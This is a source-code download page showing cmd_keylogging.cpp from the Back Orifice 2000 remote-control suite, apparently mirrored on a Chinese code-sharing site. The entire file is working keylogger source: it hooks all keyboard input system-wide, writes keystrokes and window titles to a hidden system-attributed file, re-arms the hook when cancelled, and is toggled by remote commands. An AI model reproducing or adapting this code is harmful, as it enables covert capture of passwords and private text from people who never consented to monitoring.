开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 远程控制编程 > 查看源码
cmd_keylogging.cpp
资源名称:bo2ksrc.zip [点击查看]
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:5k
源码类别:

远程控制编程

开发平台:

WINDOWS

cmd_keylogging.cpp:源码内容
  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  4.     This program is free software; you can redistribute it and/or modify
  5.     it under the terms of the GNU General Public License as published by
  6.     the Free Software Foundation; either version 2 of the License, or
  7.     (at your option) any later version.
  9.     This program is distributed in the hope that it will be useful,
  10.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  11.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  12.     GNU General Public License for more details.
  14.     You should have received a copy of the GNU General Public License
  15.     along with this program; if not, write to the Free Software
  16.     Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  18. The author of this program may be contacted at dildog@l0pht.com. */
  20. #include<windows.h>
  21. #include<osversion.h>
  22. #include<functions.h>
  23. #include<auth.h>
  24. #include<iohandler.h>
  25. #include<encryption.h>
  26. #include<commandloop.h>
  27. #include<bocomreg.h>
  28. #include<dumppw.h>
  29. #include<cmdcmd_keylogging.h>
  30. #include<bo_debug.h>
  31. #include<main.h>
  33. BOOL g_bLogging=FALSE;
  34. HANDLE g_hCapFile=NULL;
  35. DWORD g_dwKeyCapTID=0;
  36. HANDLE g_hKeyCapThread=NULL;
  37. HHOOK g_hLogHook=NULL;
  38. HWND g_hLastFocus=NULL;
  40. LRESULT CALLBACK JournalLogProc(int code, WPARAM wParam, LPARAM lParam)
  41. {
  42. if(code<0) return CallNextHookEx(g_hLogHook,code,wParam,lParam);
  44. if(code==HC_ACTION) {
  45. EVENTMSG *pEvt=(EVENTMSG *)lParam;
  46. if(pEvt->message==WM_KEYDOWN) {
  47. DWORD dwCount,dwBytes;
  48. char svBuffer[256];
  49. int vKey,nScan;
  51. vKey=LOBYTE(pEvt->paramL);
  52. nScan=HIBYTE(pEvt->paramL);
  53. nScan<<=16;
  55. // Check to see if focus has changed
  56. HWND hFocus=GetActiveWindow();
  57. if(g_hLastFocus!=hFocus) {
  58. char svTitle[256];
  59. int nCount;
  60. nCount=GetWindowText(hFocus,svTitle,256);
  61. if(nCount>0) {
  62. char svBuffer[512];
  63. wsprintf(svBuffer,"rn-----[ %s ]-----rn",svTitle);
  64. WriteFile(g_hCapFile,svBuffer,lstrlen(svBuffer),&dwBytes,NULL);
  65. }
  66. g_hLastFocus=hFocus;
  67. }
  69. // Write out key
  70. dwCount=GetKeyNameText(nScan,svBuffer,256);
  71. if(dwCount) {
  72. if(vKey==VK_SPACE) {
  73. svBuffer[0]=' ';
  74. svBuffer[1]='';
  75. dwCount=1;
  76. }
  77. if(dwCount==1) {
  78. BYTE kbuf[256];
  79. WORD ch;
  80. int chcount;
  82. GetKeyboardState(kbuf);
  84. chcount=ToAscii(vKey,nScan,kbuf,&ch,0);
  85. if(chcount>0) WriteFile(g_hCapFile,&ch,chcount,&dwBytes,NULL);
  86. } else {
  87. WriteFile(g_hCapFile,"[",1,&dwBytes,NULL);
  88. WriteFile(g_hCapFile,svBuffer,dwCount,&dwBytes,NULL);
  89. WriteFile(g_hCapFile,"]",1,&dwBytes,NULL);
  90. if(vKey==VK_RETURN) WriteFile(g_hCapFile,"rn",2,&dwBytes,NULL);
  91. }
  92. }
  93. }
  95. }
  96. return CallNextHookEx(g_hLogHook,code,wParam,lParam);
  97. }
  100. DWORD WINAPI KeyCapThread(LPVOID param)
  101. {
  102. MSG msg;
  103. BYTE keytbl[256];
  104. int i;
  105. for(i=0;i<256;i++) keytbl[i]=0;
  107. g_bLogging=TRUE;
  108. g_hLastFocus=NULL;
  110. g_hCapFile=CreateFile((char *)param,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
  111. if(g_hCapFile==INVALID_HANDLE_VALUE) {
  112. return -1;
  113. }
  114. SetFilePointer(g_hCapFile,0,NULL,FILE_END);
  116. g_hLogHook=SetWindowsHookEx(WH_JOURNALRECORD,JournalLogProc,g_module,0);
  117. if(g_hLogHook==NULL) {
  118. CloseHandle(g_hCapFile);
  119. g_hCapFile=NULL;
  120. return -1;
  121. }
  123. g_bLogging=TRUE;
  125. while(g_bLogging) {
  126. while(PeekMessage(&msg,NULL,0,0,PM_NOREMOVE)) {
  127. GetMessage(&msg,NULL,0,0);
  128. if(msg.message==WM_CANCELJOURNAL) {
  130. SetKeyboardState(keytbl);
  131. g_hLogHook=SetWindowsHookEx(WH_JOURNALRECORD,JournalLogProc,g_module,0);
  133. if(g_hLogHook==NULL) {
  134. CloseHandle(g_hCapFile);
  135. g_hCapFile=NULL;
  136. return -1;
  137. }
  138. } else {
  139. DispatchMessage(&msg);
  140. }
  141. }
  142. Sleep(0);
  143. }
  145. UnhookWindowsHookEx(g_hLogHook);
  147. CloseHandle(g_hCapFile);
  148. g_hCapFile=NULL;
  149. g_hKeyCapThread=NULL;
  152. return 0;
  153. }
  155. int CmdProc_SysLogKeys(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
  156. {
  157. if(g_bLogging==TRUE) {
  158. IssueAuthCommandReply(cas_from, comid, 0, "Logging is already turned on.n");
  159. return -1;
  160. }
  162. g_hKeyCapThread=CreateThread(NULL,0,KeyCapThread,(LPVOID)svArg2,0,&g_dwKeyCapTID);
  163. if(g_hKeyCapThread==NULL) {
  164. IssueAuthCommandReply(cas_from, comid, 0, "Error creating capture thread.n");
  165. return -1;
  166. }
  168. IssueAuthCommandReply(cas_from, comid, 0, "Key logging started.n");
  169. return 0;
  170. }
  172. int CmdProc_SysEndKeyLog(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
  173. {
  174. if(g_bLogging==FALSE) {
  175. IssueAuthCommandReply(cas_from, comid, 0, "Logging is not turned on.n");
  176. return 0;
  177. }
  179. g_bLogging=FALSE;
  180. if(WaitForSingleObject(g_hKeyCapThread,5000)!=WAIT_OBJECT_0) {
  181. IssueAuthCommandReply(cas_from,comid,0,"Logging couldn't stop in 5 sec.n");
  182. return -1;
  183. }
  185. IssueAuthCommandReply(cas_from,comid,0,"Logging stopped successfully.n");
  186. return 0;
  187. }